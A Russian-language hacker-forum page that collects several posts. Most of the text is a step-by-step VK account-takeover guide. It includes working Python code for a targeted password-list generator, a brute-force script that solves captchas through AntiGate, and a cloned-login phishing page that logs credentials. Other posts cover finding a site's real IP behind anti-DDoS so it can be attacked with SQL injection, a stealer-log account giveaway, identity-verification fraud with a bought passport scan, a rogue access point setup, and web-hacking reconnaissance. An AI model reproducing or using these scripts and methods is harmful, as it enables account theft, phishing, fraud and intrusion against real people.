sudo mv hostapd /usr/sbin

Потом

sudo chmod 755 /usr/sbin/hostapd

Далее запускаем

sudo /usr/sbin/hostapd /etc/hostapd/hostapd.conf

  После этой команды наша точка доступа будет видна . Вы можете попробовать подключиться к ней, но интернета пока нету .
Далее для запуска точки доступа при загрузке вводим

sudo service hostapd start
sudo service isc-dhcp-server start
sudo update-rc.d hostapd enable
sudo update-rc.d isc-dhcp-server enable

Теперь убираем следы изменения

sudo mv /usr/share/dbus-1/system-services/fi.epitest.hostap.WPASupplicant.service ~/ 

Теперь подключимся к нашей точке доступа с другого ноутбука , а в командной строке Raspberry пишем

tail -f /var/log/syslog

тем самым мы сможем проверить подключение к нашей точке доступа. Подключаемся, всё работает, но интернета пока нет.. Теперь переходим к  следующей главе.


  • nohnigecebybp74, nohnigecebyuk85, KatyaaEia4 и 6 другим это нравится


#251 Сайт под антиддосом, как узнать реальный IP?

Написано Joker 06 Март 2016 - 13:08

Бывает такое, что заходишь на сайт, находишь скулю и радостный собрался скормить ее скулмап, а тут куй там - сайт под антиддосом. Типа клауда или какого другого.

 

Нам же нужен реальный айпи сайта, как найти?

Задача творческая мать ее за ногу, не тривиальная.

 

Заходим на https://dnshistory.org/ - и пробуем пробить историю изменения днс домена. Для примера возьмем всеми любимый DM, darkmoney.cc, который под клаудом. Пробиваем по днсхистори и получаем предыдущую запись А 181.174.167.251. Пробиваем и выясняем, что сайт хостится в Панаме. Заходим по айпи и открываем сайт в обход клауда.

 

Второе, если первый способ не удался, что приходит на ум - проверить историю whois сайта. Для рушных это можно сделать на who.ru, для остальных на who.is

По предыдущим днс устанавливаем хостера.

 

Хостера также можно определить по другим записям днс, например MX если почта черех хостера летит.

 

Дальше надо определить диапазон айпи хостера и по диапазону айпи разослать заголовки GET с обязательным указанием хоста (имени сайта) иначе никакого детекта не будет.

Второй способ муторный, но не слишком затратный по времени. На серваке через курл очень быстро диапазоны чекаются

 


  • MyleneSi, nohnigecebybp74, nohnigecebyuk85 и 6 другим это нравится


#8 Раздача аккаунтов с логов стилера

Написано R00t 20 Июнь 2015 - 21:14

Начну с небольшой партии

 

Скрытый текст



#379 Полная декомпиляция Android приложений

Написано XakerServis 07 Июнь 2016 - 19:52

Здесь будет показан способ полной декомпиляции apk файла. Основная ценность этой статьи в описании и сравнении полезных утилит.

 

0. Зачем?
1) Чтобы посмотреть как другие приложения работают. Для учебных целей, для копирования функционала и т.д.
2) Чтобы разобрать приложение популярное, "пропатчить" его малварём и собрать обратно (об этом возможно в другой статье или никогда)

 

1. Список утилит.
Они использоваться будут не все, но знать о них полезно. Ссылки на исходники будут в конце описания конкретной утилиты. Если модераторы посчитают пост полезным - сделают нормальные ссылки.

 

1) apktool - базовая утилита для декомпайла ресурсов приложения и байткода .dex в .smali Формат плохочитабелен для людей, говорят похож на ассемблер.

Полезно, если надо посмотреть статические ресурсы, вроде строк, layout, drawable и т.д. 
Ссылка - github.com/iBotPeaches/Apktool

 

2) dex2jar - Конвертирует .dex в .jar. Т.е. в промежуточной java байткод .class. Утилита безнадёжно устарела, давно не . На больших апк крашится в тихую. Не советую использовать.
Ссылка - github.com/pxb1988/dex2jar

 

3) enjarify - Делает тоже самое, что и dex2jar только лучше. Разрабатывается google, написана на питон. Её мы будем использовать.
Ссылка - github.com/google/enjarify

 

4) fernflower - Конвертирует .class .jar в java код. Основная утилита, что я использую. Поддерживается компанией jetbrains. Есть такая плюшка, как переименование коротких названий в более осмысленные (деобфуксация). Его можно собрать из исходников в репозитории по ссылке.
А можно скачать собранную мною версию - yiy4ksveqrax675y.onion/files/ce0b22393dd2c1d7063d20a21289482b.txt (расширение поменять на jar)
Ссылка - github.com/JetBrains/intellij-community/tree/master/plugins/java-decompiler/engine

 

Некоторые методы он просто не разбирает, вроде такого. Причина мне неизвестна.

protected void onActivityResult(int param1, int param2, Intent param3) {
      // $FF: Couldn't be decompiled
 }

Деобфуксация тоже работает негладко - воздействует только на имена <= 3 символов. В большом проекте много и по 4 символа. Но, если очень надо, то можно в исходниках это поправить. Ещё деобфуксация не работает с названиями классов.

 

5) Procyon - Конвертирует .class .jar в java код. Я использую в качестве вспомогательной утилиты, там где fernflower не справился.
Ссылка - bitbucket.org/mstrobel/procyon/wiki/Java%20Decompiler

 

Иногда procyon выдаёт такую вот хуету (compile error). Но это норм, безгрешных декомпиляторов нет. Намного лучше, чем jadx и jd:

try {
      this.getContentResolver().takePersistableUriPermission(intent.getData(), 3);
}
finally {
      final Throwable t;
      Log.e("BaseActivity", "data=" + intent, t);
}

6) CFR - Конвертирует .class .jar в java код. Утилита тоже неплохая, но похуже, чем fernflower и procyon. Можно использовать в качестве вспомогательной утилиты.
Ссылка - benf.org/other/cfr/

 

Вот какие траблы иногда бывают - бесконечные циклы и goto, там где они вообще не должны быть

try {
     super.onBackPressed();
     do {
           return;
           break;
           } while (true);
     }
catch (IllegalStateException var1_1) {
     String string2 = "SomeAnonymousString";
     String string3 = "";
     Log.e((String)string2, (String)string3, (Throwable)var1_1);
     return;
}	

7) jadx-gui. Deprecated. Оконный интерфейс. Конвертирует .apk .jar .class в java код. Со своей задачей справляется, но не всегда хорошо. Не поддерживает фичи >= java7.
Ссылка - github.com/skylot/jadx

 

Раньше, на windows, пользовался им и норм. Сейчас почему-то на моём ноуте с достаточно мощными характеристиками i7 16gb memory он не может открыть апк, идёт декомпиляция, комп шумит как негр на плантации и фриз. Не хочу в нём копаться ради примера плохого кода, просто поверьте, что качество декомпиляции хуже вышеупомянутых.

 

8) jd-gui. Deprecated. Оконный интерфейс. Конвертирует .class .jar в .java код. В принципе работает, но не поддерживает фичи java7 java8. Хуже вышеупомянутых.

 

Иногда выдаёт такую вот хуету (какие-то ебанутые бесконечноые циклы и переменная bool, которая объявляется после присвоения - compile error):

try{
    bool = super.dispatchTouchEvent(paramMotionEvent);
}
catch (IllegalArgumentException localIllegalArgumentException){
      for (;;)
      {
            String str1 = "BaseActivity";
            String str2 = "";
            Log.e(str1, str2, localIllegalArgumentException);
            boolean bool = false;
            Object localObject = null;
      }
}
return bool;

fernflower Этот же метод отлично раскомпилировал.

 

9) Невошедшие в список, потому что мне в лом сейчас их тестить. Потом займусь. Второй выглядит мутно, так что можете не тратить время. Первый же можно проверить, говорят норм.
Ссылка - github.com/Storyyeller/Krakatau
Ссылка - github.com/bradsdavis/candle-decompiler

 

 

2. Полная декомпиляция приложения до исходного вида.

 

1) Воспользуемся apktool. java -jar ~/apktool/apktool_2.1.1.jar d -f ~/apktool/apk/somefile.apk
Получим декомпилированные ресурсы: картинки, строки, атрибуты и манифест и т.д. Все как на блюдечке, кроме кода. Папку smali можно сразу удалять.

 

2) Воспользуемся enjarify, чтобы получить промежуточный байткод .class запакованный в .jar . cd ~/Android/apktool/enjarify ~/apktool/enjarify/enjarify.sh ~/apktool/apk/somefile.apk
mv ~/apktool/enjarify/somefile-enjarify.jar ~/apktool/sources

Для работы необходим python3 или лучше pypy3.

 

3) Воспользуемся fernflower, чтобы из jar с .class получить .jar с человечески читабельной .java -jar ~/apktool/fernflower.jar -ren=1 -dgs=1 ~/apktool/sources/somefile-enjarify.jar ~/apktool/sources/fernflower/

Tip* Папка, в которой находится jar для декомпайла, и папка для output должны отличатся, иначе будут очень странные ошибки
Tip** -ren=1 для деобфуксации. -dgs=1 для декампайла дженериков<Integer>

Из получившегося архива .jar копируем java файлы в наш проект

 

4) Необязательный пункт. Если какие-то методы/классы не декомпилировались, такое бывает. То советую воспользоваться утилитой procyon, возможно у неё получится. java -jar ~/apktool/procyon-decompiler-0.5.30.jar -jar ~/apktool/sources/somefile-enjarify.jar -o ~/apktool/sources/procyon

*Tip Не советую использовать систему windows, потому что, если обфуксация была без флага -dontusemixedcaseclassnames (Disable: obfuscated class names can contain a mix of upper-case characters and lower-case characters), то на windows будут ошибки, т.к. она case insensetive. Да и вообще windows гавно.

 

5) Профит! У нас получился близкий к исходному android проект. Конечно, будет куча синтаксических ошибок, в зависимости от сложности жертвы, но их можно будет просто исправить в ручную.


  • MyleneSi, nohnigecebybp74, nohnigecebyuk85 и 5 другим это нравится


#372 Быть хакером?!

Написано Joker 16 Май 2016 - 23:38

Быть хакером?!

Пожалуй слишком многие употребляют это слово, а именно ХАКЕР, не зная его значения. Думая ложные вещи о людях, которых так называют сми,новостные сайты, знакомые. Зашел вконтактик с компа знакомой - хакер, ограбил банк  - хакер. Починил компьютер и переустановил Винду - тот же хакер.

И лишь единицы понимают истинный смысл слова и могут по праву называться Хакером.
Суть этой статьи, в том чтобы разъяснить вам, кто такие хакеры и каким образом вам стать одним из них.
Данное слово пришло в конце 20 века. Происходит от понятия hack, что значит "рубить". Тогда это значило конкретно необычное простое решение какой-то проблемы, сам создатель решения - хакер.

1) Кто эти люди?
Я не беру стереотипный ответ, который вы знаете и без меня. Взломщик.
Нет. Это специалисты в чем-либо, не обязательно интернет-технологиях или взломе,или же программировании. Это может быть хоть художник, учитель или кто угодно.
Суть в другом. В качествах, которыми наделены данные люди.
Это те кто способны ночи напролет быть увлечены одной задачей, те кто умеют смотреть глубже, чем обычные люди, те кто не подвержены стереотипам и видят картину в целом. Те кто обладают живым мышлением и возможностью творить. Знания, которые имеют эти люди - это лишь побочный эффект их мышления.

Атрибуты:
-- Упорство
-- Хакерский взгляд на вещи
-- Творческое мышление
-- Знания в одной или нескольких областях
-- Понимание данной статьи


Далеко не всегда вы можете определить это сходу. Вполне возможно, что этот уставившийся в стекло парень с глупым выражением лица - хакер, или эта женщина, которая сидит вконтактике и печатает тупые смайлики в ответ на каждое сообщение.
А потом он приходит домой и занимается кардингом. А она сидит на хак.форуме и пишет анонимные сообщения от своей темной личности. Попутно занимаясь онлайн заработком.

Вам просто не дано узнать о том, кто такой этот человек со стороны. Однако хакеру обычно не составляет труда разобраться в ком-либо за небольшое время. Основная масса людей очень стереотипна, вся под копирку и не готова изменяться. Большинство подчиняется правилам этой игры, общества. Хакер обычно либо вне это круга, либо разделяет свои личности и способен обойти часть ограничений просто подумав как следует головой.

2) Как стать хакером?
Вы должны отказаться от желания быстро пройти этот путь. Чтобы стать хакером нужно полностью изменить свое мышление. Часто мы читаем сообщения новичков на форуме о том, как они хотят что-то взломать или же быстро заработать денег. Но это подвластно только настоящему хакеру, коим они не являются.
Как раз эти их посты и говорят об этом. Хакер не задает вопросы, не имеется ввиду вообще, а конкретно не ждет пока кто-то сделает что-то за него. Хакер ищет решение сам. Для него интернет - рай земной. Свободный доступ к информации сейчас дает возможность полностью получить доступ почти к любым знаниям и впитать их как губка.

Неважно школьник вы или же старик. Неважно считаете, вы что-либо слишком сложным. Это далеко не так. Не существует сложного. Есть просто задача - понимание которой занимает более долгое время. Достаточно разложить суть проблемы на подчасти. Если слишком сложно - еще разделяем и так далее. Грубо говоря если вы не умеете гуглить - погуглите, как это правильно делается.

Когда вы начнете приближаться к осознанию того, кто такие хакеры и самому постепенно становиться им - это перестанет быть самоцелью. Хакеры испытывают удовольствие от решения проблем, от нахождение обходного пути, от понимания сути процесса
Все еще не испытываете подобное? Жаль..

Возможно лишь пока, возможно прочтя эту статью вы задумаетесь и примите правильные решения.

3) Рыбак рыбака.
Когда вы достигнете каких-то результатов - вы с удивлением начнете открывать, что эти люди повсюду. По горящим глазам, по фразам, по интонации и поступкам людей вы начнете видеть своих. Только не надо говорить им - "Привет, а я хакер, ты тоже да?)))" Тогда смело идите в начало статьи..

Хакеры обычно не нуждаются в обществе, как я уже говорил. Но частично они формируют новое общество. Общество индивидуальностей, которое проще всего вам будет найти в интернете. Общество тех кто не зависит от других, равноправное и имеющее свои принципы и ценности. На этом форуме, да такое имеется. Все дело в том, кто вы в нем. Чем больше людей будет понимать смысл этого текста, тем сильнее мы станем как целое.

К чему я это все? Мы сейчас на хакерском форуме. Я уверен, что вы здесь не случайно. И есть надежда, что вы готовы измениться. Помните.
Этот форум создан хакерами для хакеров, как в принципе и сам интернет изначально. Так помните же истоки и не деградируйте, а развивайтесь. Быть вам хакером!!
 


  • MyleneSi, nohnigecebyuk85, ShotbHaw и 5 другим это нравится


#370 Способ идентификации Яндекс кошелька без паспорта

Написано Joker 12 Май 2016 - 13:17

Доброго времени суток!

Хочу поделится способом идентификации Яндекс кошелька, покрайней мере у меня в городе данный метод сработал.

Для справки что дает идентификация:
-платежи по всему миру — до 250 000 рублей за один раз;
-переводы кому угодно — на кошелек, карту или счет в банке;
-возможность снимать в банкоматах до шести миллионов рублей в месяц;
-дополнительную защиту — в спорной ситуации мы больше доверяем тому, кто показывал паспорт.
(взято с кошелька)

Итак, для идентификации предлагается несколько способов и один из них через "Евросеть". Через сие заведение я решил идентифицировать свой личный кошелек, распечатав заявление как указано  в личном кабинете. Взял паспорт и отправился в ближайший офис. Так вот, похоже работникам абсолютно пойух кто там что идентифицирует, девочка лет 18 спросила номер моего кошеля и паспортные данные, я дал ей заполненное заявление где все эти данные указаны, полез было за паспортом, но видя что больше вопросов ко мне не возникает решил не торопиться.
Заплатив 50р и сверив номер кошелька на чеке, спокойно удалился.

Меня несколько смутило такое отношение к серьезному в принципе делу и решил я проверить другой салон. Создал кошелек по купленному скану, так же распечатал заявление и получил в итоге тот же результат.

Кошелек забросил, так как думаю, что для более менее серьезных дел при посещении салона использовать какие ни какие средства маскировки, ну мало ли там чего, либо дропа.

Ну вот как то так. Срошу ваши соображения по этому поводу.
Спасибо за внимание!


  • nohnigecebybp74, nohnigecebyuk85, sapedBef и 5 другим это нравится


#22 Актуальное образование. Какое выбрать?

Написано Tatarin 25 Июнь 2015 - 14:47

Сегодня как никогда актуальна тема образования, некоторые утверждают что без него никуда, некоторые говорят, что оно не нужно и бесполезно, так всё же, давайте расставим точки над и. Давайте обсудим некоторые виды образования и посмотрим на это со стороны человека который не имеет особых предрасположенностей к чему либо или они весьма специфичны, а так же поделимся опытом и мыслями по поводу актуальности того или иного (или всего) образования.

 

Образование:

  • Экономическое
  • Юридическое
  • Менеджерское
  • Связанное с работой руками
  • Мусорское Милицейское или Полицейское
  • Военное

 

Возможно пополнение списка.
Прошу не тему сильно не пинать.


  • MyleneSi, Edwardson, nohnigecebybp74 и 5 другим это нравится


#217 Как взломать Вконтакте?! "Раскрываем секреты".

Написано Joker 27 Январь 2016 - 14:05

Наконец-то!!! Cкажут десятки/сотни школьников(и не очень), долгое время терроризировавших мои контакты. Еще раз повторяю, я не ломаю вконтактик за деньги, но для тех кому все-таки неймется, была написана эта статья.

 

Итак, как же взломать Вк?

Простой ответ - никак! Более полный - если учесть, что большинство пользователей совершают ошибки, то взлом возможен, но не путаем понятия. Уязвимости, позволяющей взламывать абсолютно любого юзера за пять сек нет и не будет. А если и будет, то никто не собирается вам ее предлагать. Поэтому, те способы, которые я представлю ниже, тем или иным образом направлены на обман юзера и используют отсутствие у него мозга.

 

Разделим весь процесс на несколько этапов. Первоначально нам понадобится цель,свободное время, безопасный доступ к вк(если хотим сохранить анонимность конечно) и можем приступать.

----------------------------

 

Этап №1 - "Сбор информации"

На этом этапе мы имеем страницу юзера, которого бы желательно взломать и нам необходимо собрать, как можно больше полезной информации, которая бы впоследствии помогла в успешном взломе.

 

Что же такого имеется на странице?
1) Урл страницы. Сохраняем себе айди или если там имеется буквенная замена, то ее. Аккаунты и прочее данного человека, всякого рода твиттеры и прочее.

 

2) Разумеется мы бы хотели заиметь почту цели.
Писать ему/ей напрямую и выпытывать? В большинстве случаев это не потребуется. Если человек не только попал в сеть, вы сможете найти почту путем простого гугления. Например особо удобно отыскивать мыло на мэйл ру. Один из способов - это просто погуглить фио цели и дату рождения. Или же другого рода такие комбинации. Если цель имеет мой мир на маиле, то почта будет в коде страницы или же в урл.
Если просто имеется почта без соц.сети от мейла ее тоже можно запросто выяснить зарегавши себе другую почту на этом сервисе и поискав в мессенджере от мэйла.

И как вариант вы можете поискать полезную информацию с помощью имеющихся у цели аккаунтов. То есть берем например никнейм в Твиттере/Фейсбуке/другое и пробиваем по популярным почтовым сервисам. Также в Твиттере можно использовать форму восстановления и узнать часть почты. В фейсбуке можно напрямую поискать аккаунт введя почту в поиск. И в некоторых сервисах есть такая штука, как импорт почтовых контактов и предложение добавить этих людей в друзья. То есть можно зарегать левую почту и узнать дополнительные аккаунты.
Если почта не была запалена сразу, то найти ее можно только так с помощью последовательного поиска полезной информации.

 

3) Телефон.
А как же узнать номер человека? Если исключить такие варианты, как публикация юзером своего номера на странице(есть и такие) и например использования им телефона для связи в каком-либо проекте, где он выложен в открытую(Авито/Свой сайт/Покупка или продажа недвижимости/Другое), то остается лишь этот вариант.

Есть такой, не сказать открытый, но достаточно простой способ, позволяющий узнать номер юзера, если у вас имеется несколько его аккаунтов, привязанных к одной и той же почте.

Приведу пример:
Имеется почта юзера на маиле. Вводим ее в форму восстановления вконтакте и нам пишет часть номера. Вводим также ее на маиле в восстановлении. И если номер там привязан, то вы увидите уже, другую часть номера. Если почта не привязана, то тогда там есть секретный вопрос. Перебираем его и заставляем юзера привязать мобилку на сервис.
Теперь у вас не хватает лишь двух цифр от почты. Чтобы их узнать достаточно перебрать форму восстановления вк уже с помощью номера. Всего-то 99 раз. Можно и автоматизировать. А когда будет запрашивать фамилию страницы, как доп защиту, запросто вводим ее. Ведь мы же знаем страницу цели.

 

Также в некоторых случаях люди любят публиковать свой номер на странице, но закрывать часть номера звездочками, черточками и тд. Это тупость еще та. Если вам повезет, то будут незакрыты именно те цифры, которые вам недоступны в форме восстановления вк.

 

 

Этап №2 - "Собственно взлом"
В данном этапе вы должны получить доступ к аккаунту цели. Я опишу самые простые способы.

 

Основные способы:
1) "Социнженер"
Сразу скажу этот способ годится либо для совсем школьников, либо наоборот для стариков, которые мало что знают об интернете, но решили по каким-либо причинам зарегаться в соц.сети.

Если вы хотите просто попрактиковаться, то новички вк могут быть найдены
здесь - vk.com/catalog.php

 

В основном тут используется простой механизм. Человек, который не разбирается в чем-то, подсознательно доверяет более опытным юзерам/админам/техподдержке и принимает их слова на веру.

 

Тут можно создать аккаунт представителя техподдержки, создать "официальную" почту администрации и прочее. И придумать некую ахуительную историю. Что новые юзеры обязаны проходить проверку после регистрации и дать например ссылку на некий тест, по итогу или для входа которого требуется логин-пасс от вк. Главное в общем-то не заострять внимание на пароле. Просто писать,что можете ли вы написать мне свои данные от аккаунта не стоит. Следует убедить пользователя, что он в безопасности. Этот способ хорошо сочетается с фейком. Кроме того продвинутые социнженеры могут узнав номер юзера позвонив(разумеется анонимно, используя sip) и развести напрямую. Кроме того все извлеченная вами информация, например известный вам номер телефона/упоминание фактов с указанием дат/другое косвенно говорит о том, что вы из техподдержки(для лохов) или кулхацкер, как мы знаем.

 

В данном способе все зависит от вас, поэтому вы можете прокачать свои навыки на разного рода новичках в вк, а потом переходить к более-менее обычным юзерам.


2) "Умный брутфорс"
Брутфорс - это перебор пароля, кто не в курсе. Данная атака сработает, если наша цель - среднестатический юзер, который ставит слабые пароли на свои аккаунты, для более легкого запоминания.

Для него нам понадобится, заточенный исключительно под нашего юзера словарь. Такой неоткуда не возьмешь, поэтому составляем сами. Что у нас есть?
Представлю примеры(персонаж вымышленный).

-- Дата рождения - 17.11.1992 = 1711, 1992, 17111992 
-- Возраст - 2016 - 1992 = 24
-- Имя - Стас = stas, ctac
-- Фамилия - Курягин = kuryagin,
-- Аккаунты - twitter.com/stasik_ku , facebook.com/stasss1992, stasss92 @ mail.ru = stasik_ku, stasss1992, stasss92
-- Увлечения - футбол, плавание, молодежка = football, swimming, molodejka, molodegka

Также есть страница вк, на которой написано какие пароли следует указывать, какие символы возможны и самые частые пароли. https://vk.com/page-777107_1000339

Получился лист из 14 строк. Но из него еще нужно создать комбинации паролей, которые мог бы создать недалекий юзер.

 

Представляю вам мой небольшой скрипт на python, который этим и занимается:

#! coding:utf-8

import sys,os

razdel = ['_',':',';']

def uniq(seq):
    seen = set()
    seen_add = seen.add
    return [x for x in seq if not (x in seen or seen_add(x))]

def brute_words(spisok):
    spisok2 = []
   
    for i in spisok:
        spisok2.append(i)
        spisok2.append(i[0].upper()+i[1:])
        spisok2.append(i[0].upper()+i[1:-1]+i[-1].upper())
        spisok2.append(i.upper())
        for j in spisok:
            spisok2.append(i+j)
            for m in razdel:
                spisok2.append(j+m+i)
            spisok2.append(j+i)
            spisok2.append(i+i+j)
            spisok2.append(j+j+i)
            spisok2.append(i[0].upper()+i[1:]+j)
            spisok2.append(i[0].upper()+i[1:-1]+i[-1].upper()+j)
   
    return uniq(spisok2)

def generate(spisok_file):
    o = open(spisok_file,'r')
       
    spisok = o.read().splitlines()

    for i in brute_words(spisok):
        print i

def main():
    try:
        argv1 = sys.argv[1]
        generate(argv1)
    except IndexError:
        print "Нужно указать файл"

    except IOError:
        print "Нет такого файла"

if __name__ == "__main__":
    main()

Из 14 получилось 1272 варианта. Приведу часть:

Molodegkactac
MolodegkActac
molodejka_molodegka
Stasss92molodejka
stasss92molodegka
molodegka_stasss92
molodegka:stasss92
molodegka;stasss92
stasss1992swimming
swimming_stasss1992
Kurayginctac
KuraygiNctac
kurayginkuraygin
kuraygin_kuraygin
molodegka17111992
1711199217111992molodegka
molodegkamolodegka17111992
24
1711_24
и тд...

 

Но что же с этим делать? Не сидеть же и перебирать вручную каждый пароль.
Разумеется, необходимо все более или менее автоматизировать.

 

Для этой цели я набросал небольшой скрипт, который брутит через мобильную версию вк:

#! coding: utf8
import grab,re,urllib2
from antigate import AntiGate
from grab import GrabTimeoutError
from time import sleep

cap_key = '123 ' #Ваш ключ с антигейт

def anti(key, file): #Получение решения капчи с антигейт
    try:
        try:
            data = AntiGate(key, file)
            return data
        except KeyboardInterrupt:
            print "Завершение"
    except:
        anti(key,file)

def save(url, file): #Скачивание файла по урл
    f = urllib2.urlopen(url)
    f2 = open(file, 'wb')
    f2.write(f.read())

def cap_solve(img):
    save(img, 'captcha.jpg')
    key = anti(cap_key, 'captcha.jpg')
    return key

def brute(login,passwords,save):
    o = open(save,'w')
    o2 = open(passwords,'r')

    try:
        int(login)
        prefix = True
    except:
        prefix = False
    g = grab.Grab()
    g.go('http://m.vk.com')
   
    for i in o2:
       
        i2 = i.rstrip('\r\n')
        g.doc.set_input('email',login)
        g.doc.set_input('pass',i2)
        g.doc.submit()

        if g.doc.text_search(u'captcha'):
            c1 = re.findall('"(/captcha.php[^"]*)"', g.response.body)[0]
            c2 = 'http://m.vk.com' + c1
            key = cap_solve(c2)
            g.doc.set_input('email',login)
            g.doc.set_input('pass',i2)
            g.doc.set_input('captcha_key',str(key))
            g.doc.submit()
            print "cap"

        if 'Подтвердить' in g.response.body:
            if prefix:
                prefix1 = g.doc.rex_search('<span class="field_prefix">\+[0-9]*</span>').group(0)
                prefix2 = g.doc.rex_search('<span class="field_prefix">&nbsp;[0-9]*</span>').group(0)
                pre1 = re.findall('[0-9]{1,}', prefix1)[0]
                pre2 = re.findall('[0-9]{1,}', prefix2)[0]
           
                login = login.replace(pre1,'')
                login = login.replace(pre2,'')
           
                g.set_input('code', login)
                g.submit()
                print login + ':' + i2 + '--success'
                o.write(login + ':' + i2 + '\n')
            else:
                o.write(login + ':' + i2 + '\n')
        else:
            if g.doc.rex_search('<title>[^>]+</title>').group(0) == '<title>Login | VK</title>':
                print login + ':' + i2 + '--fail'
            else:
                print login + ':' + i2 + '--success'
                o.write(login + ':' + i2 + '\n')
    o.close()
    o2.close()

Он для одиночной цели, не стал делать прокси,многопточность и прочие фишки.
А то школьники еще поломают кого)

За то он может сам ввести недостающие цифры в защиту вк заходе с другой страны. Также с помощью антигейт запросто вводит капчи, которые появляются после 5-6 попытки ввода с одного айпи.

 

3) "Фейк наше все"

Данный способ предназначен для невнимательных людей. По большей части их либо завлекают халявой, либо отвлекают внимание с помощью многобукв. Я покажу вам, как создать простой фейк на основе обычного сайта вк(страницы логина). Можете брать, как мобильную, так и основную версии зависит от того, с какого устройства будет заходить юзер.

 

Насчет регистрации на хостинге и покупки похожего домена ничего писать не буду, так как это банально просто.

 

----
Ручной способ:

Первым делом качаем страницу логина вк через ваш браузер. Затем смените кодировку html файла на utf-8.

 

Сначала определяем кодировку

file --mime-encoding file.html

Затем меняем с исходной на новую

iconv -f iso-8859-1 -t utf-8 file.html > vk2.html

Далее вам нужно создать управление страницей на серверном языке. Для этой цели
я также использовал python. Можно заюзать простейший фреймворк под названием bottle. Его плюс, в том что ему не нужны никакие зависимости. Просто качаете файл скрипта с сайта и все.

@route('/')
def index():
    return template('vk2.html')

@route('/Welcome! | VK_files/<filepath:path>')
def server_static(filepath):
    return static_file(filepath, root='./Welcome! | VK_files/')

После тестового запуска скрипта обнаружилась ошибка 404 на кое-каких файлах.

У нас к сожалению не имеется нужных картинок с сайта. Давайте положим их в отдельную папку images.

mkdir images
cd images
wget http://vk.com/images/hatf_vk.gif
wget "http://vk.com/images/darr_dd_out.gif"
wget "http://vk.com/images/backlink.gif"
mkdir icons
cd icons
wget "http://vk.com/images/icons/facebook_btn_icon.png"
wget "http://vk.com/images/icons/check.gif"

Пропишем новый роутинг в скрипте.

@route('/images/<filepath:path>')
def server_static(filepath):
    return static_file(filepath, root='./images/')

Теперь все стало на порядок красивее. Вы конечно можете скачать также основные страницы, на которые можно перейти с основной не залогинившись, чтобы было правдоподобней(а потом поменять ссылки в основной), но и одной хватит.

Чего же не хватает? Ах да конечно. После логина ничего не происходит. Давайте изменим это.

Добавим роутинг для пост запроса. Найдем форму логина на странице. Изменим в ее коде action на пустое и удалим проверку onsubmit. И добавим обработку post-запроса.

@post('/')
def index():
    login = request.forms.get('email')
    password = request.forms.get('pass')
    print "|Catch|-------------- " + login + ':' + password

    with open("log.txt", "a") as myfile:
        myfile.write(login + ':' + password + "\n")
   
    return redirect('http://www.vk.com')

Так работает. Правда пока лишь после нажатия enter, но не по клику кнопки.
Переносим тег button, что под формой в коде в пределы формы и добавляем свойство type="submit".
После этого кнопка работает, как надо.

Архив с готовым решением.

 

Пароль к архиву:

hackres.ru

--
Автоматический способ:
Если хотите использовать уже готовое решение, то можно воспользоваться тулкитом SET. Social Engineer Toolkit. Входит в дистрибутив кали. Можно установить на обычный debian на сервере, используя репы kali или установив все зависимости по отдельности.

 

Используем функцию site cloner в составе set. В нем есть дополнительные возможности, такие как встраивание вредоносных скриптов прямо в страницу или же добавление опасных flash.


  • OLGA, MyleneSi, nohnigecebybp74 и 5 другим это нравится


#391 Взлом сайта: Основные аспекты

Написано XakerServis 03 Август 2016 - 16:41

Давно не пополнял копилку статей. В связи с тем фактом, что ко мне частенько обращаются люди по поводу взлома сайтов после Амбероада, я бы хотел осветить основные моменты данной деятельности.

О данной статье:
Здесь будет рассмотрена общая логика взлома и анализа одного выбранного абстрактного ресурса и выделены основные категории, к которым приложены реальные примеры. Да здесь не будет универсального волшебного метода. Однако после прочтения статьи если до этого вы не знали, как подступиться к взлому интересующего вас веб-ресурса, вы сможете понять в какую сторону продвигаться и с чего начать.
Приступим же...

 
1) Знакомство с ресурсом.
Первым делом необходимо понять, что за сайт перед нами.
Самописный ли он или же это движок(CMS)?
Какой язык программирования используется?
Что за серверное ПО используется?

Эти и многие другие вопросы нам предстоит решить.

-- Версии ПО
Думаю сначала необходимо заглянуть в исходный код веб-страницы. Если вы в firefox-based браузерах, то нажмите ctrl+u. Разумеется вы должны понимать, что это исходной код не серверной части, а клиентский html,css,javascript - отданный сервером нашему браузеру. Итак, что же там может быть полезного?
Обычно если это известная CMS, можно обнаружить ее версию, если она специально не была скрыта. Этим грешат известные форумы, блоги и тд. Можете нажать ctrl+f и поискать "ver" или "version". Например - wordpress.co.ua
Здесь виден следующий тег "<meta name="generator" content="WordPress 4.5.3"

Также бывают видны версии отдельных плагинов. Это пригодится для нахождения известных уязвимостей.
Не забываем проверить robots.txt
Это файл предназначенный для просмотра роботами поисковых систем, который однако иногда содержит полезные директории, недоступные в качестве прямых ссылок с сайта.

Можете проверить каждую из этих ссылок на доступ, иногда сервер бывает неправильно сконфигурирован и можно посмотреть файлы из директорий, непредназначенных для чужих глаз.

Также можно глянуть известное ПО, наподобие - /phpmyadmin, /myadmin.
Там может быть web-админка для базы данных.

Если вы ничего подобного не находите, то это значит, что либо админы постарались скрыть факт использования определенной CMS, либо что сайт самописный.
Но конечно можно также определить, что за движок используется по косвенным признакам.
Например, в урлах присутствует wp-content - Wordpress
Имеется /modules/mod_ - Чаще всего Joomla
Определенная страница регистрации - community/ucp.php PhpBB
И так далее. Главное ознакомиться с популярными решениями в веб.
Также можете проверить файл .htaccess Чаще всего он недоступен, но в торе например встречал сайты, на которых его можно было посмотреть. Там могут быть полезные ссылки. Или же sitemap.php, sitemap.xml

-- Сервер

Далее никогда не помешает узнать побольше информации о самом сервере.
Если ресурс расположен в клирнете, то можно просканировать его с помощью nmap.
nmap -F ip (Узнает основные открытые порты)

Получите нечто вроде такого.
Nmap scan report for duckduckgo.com (46.51.197.89)
Host is up (0.38s latency).
rDNS record for 46.51.197.89: ec2-46-51-197-89.eu-west-1.compute.amazonaws.com
Not shown: 97 filtered ports
PORT    STATE  SERVICE
25/tcp  closed smtp
80/tcp  open   http
443/tcp open   https

Nmap done: 1 IP address (1 host up) scanned in 7.75 seconds

С помощью nmap можно также идентифицировать отдельные версии сервисов или же ОС сервера.

Например:
sudo nmap -O ip

Running (JUST GUESSING): Crestron 2-Series (90%), Netgear embedded (90%), Western Digital embedded (90%), HP embedded (87%), AXIS Linux 2.6.X (87%), Linux 2.6.X|3.X (85%)
OS CPE: cpe:/o:crestron:2_series cpe:/o:axis:linux:2.6 cpe:/o:linux:kernel:2.6 cpe:/o:linux:kernel:3
